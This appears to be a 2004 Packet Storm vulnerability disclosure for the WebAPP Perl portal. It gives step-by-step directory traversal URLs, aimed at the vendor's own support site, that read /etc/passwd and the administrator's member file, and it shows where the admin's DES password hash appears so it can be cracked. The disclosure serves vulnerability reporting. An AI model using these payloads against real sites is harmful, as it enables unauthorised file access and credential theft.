exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

webapp.traversal.txt

webapp.traversal.txt
Posted Aug 26, 2004

WebAPP is susceptible to a directory traversal attack and another flaw that allows an attacker the ability to retrieve the DES encrypted password hash of the administrator.

tags | exploit
SHA-256 | 11c3e39d3b080f15fea744544c722881b3bd66496b99b5de45c74dda7613da5a

webapp.traversal.txt

Change Mirror Download



WebAPP is advertised as the internet's most feature rich,
easy to run PERL based portal system.
Its home site is at http://www.web-app.org/
Some features are :

-Easy to Install on standard Unix servers!
(Windows user-supported only!)
-User Profiles
-Message forums
-Private messaging between members
-Blog-style News Articles
-Links and Downloads
-Customizable themes
-Multiple language support
-Flat-file System-NO SQL DATABASE!
-Membership controls
-Open source

Several user mods are also available which ranges from chat
to e-commerce applications.

Several vulnerabilities in these mods have already been
discovered.



The WebAPP system itself has a serious reverse directory
traversal vulnerability.

Example..

1) Go to http://cornerstone.web-app.org/cgi-bin/index.cgi
/this is their main support site/

2) Click on Articles on the main menu at the left side of
the screen

3) Click on any of the icons representing the misc topics
available /i chose the "bugs" section/

4) You'll wind up with the url "http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=bugs"
on the address bar on your browser. Change it to
"http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"

5)View the html source for the page



A more interesting file to look at would be;
"http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"

View the html source code and scroll down until you come to
the line with;
href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"></a></td>

"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted so you can
run a password cracking program to crack it

Every user would have a corresponding .dat file within the
db/members directory


PhTeam Release

Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball





Philweb Corporation FREEMAIL Services
http://www.philwebinc.com
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close